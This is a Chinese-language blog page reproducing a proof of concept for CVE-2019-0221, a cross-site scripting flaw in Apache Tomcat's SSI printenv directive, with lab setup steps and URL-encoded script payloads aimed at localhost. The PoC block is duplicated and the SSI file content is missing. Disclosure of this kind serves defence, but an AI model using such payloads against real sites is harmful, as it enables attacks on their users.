CVE-2019-0221_Apache_Tomcat_9.0.0.M1_XSS漏洞

# CVE-2019-0221 Apache Tomcat 9.0.0.M1 XSS漏洞

==影響版本==
Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93

==XSS==

# Exploit Title: Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)
# Date: 05/21/2019
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93
# CVE : CVE-2019-0221

# Requirements:

# SSI support must be enabled within Apache Tomcat. SSI support is not enabled by default.

# A file (usually "*.shtml") with the "printenv" SSI directive must exist within the web application.

# The file must be accessible.



# Proof of Concept:

# Install a Java Runtime Environment (JRE)

# Download a vulnerable version of Tomcat and extract the contents

# Modify line 19 of the conf\context.xml file to globally enable privileged context
Context privileged="true">

# Modify conf\web.xml to enable the SSI Servlet as per the Apache Tomcat User Guide

# Put the following code in "webapps/ROOT/ssi/printenv.shtml"

  
    Echo:  

Printenv: # Run Tomcat cd bin catalina run # Call the following URLs to observe the XSS. You may need to use FireFox. Observe the difference between the "echo" directive which escapes properly and the "printenv" directive which does not escape properly http://localhost:8080/ssi/printenv.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EXSS%3C/h1%3E%3Cbr/%3E%3Cbr/%3E http://localhost:8080/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E


==影響版本==
Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93

==XSS==

# Exploit Title: Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)
# Date: 05/21/2019
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93
# CVE : CVE-2019-0221

# Requirements:

# SSI support must be enabled within Apache Tomcat. SSI support is not enabled by default.

# A file (usually "*.shtml") with the "printenv" SSI directive must exist within the web application.

# The file must be accessible.



# Proof of Concept:

# Install a Java Runtime Environment (JRE)

# Download a vulnerable version of Tomcat and extract the contents

# Modify line 19 of the conf\context.xml file to globally enable privileged context
Context privileged="true">

# Modify conf\web.xml to enable the SSI Servlet as per the Apache Tomcat User Guide

# Put the following code in "webapps/ROOT/ssi/printenv.shtml"

  
    Echo:  

Printenv: # Run Tomcat cd bin catalina run # Call the following URLs to observe the XSS. You may need to use FireFox. Observe the difference between the "echo" directive which escapes properly and the "printenv" directive which does not escape properly http://localhost:8080/ssi/printenv.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EXSS%3C/h1%3E%3Cbr/%3E%3Cbr/%3E http://localhost:8080/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容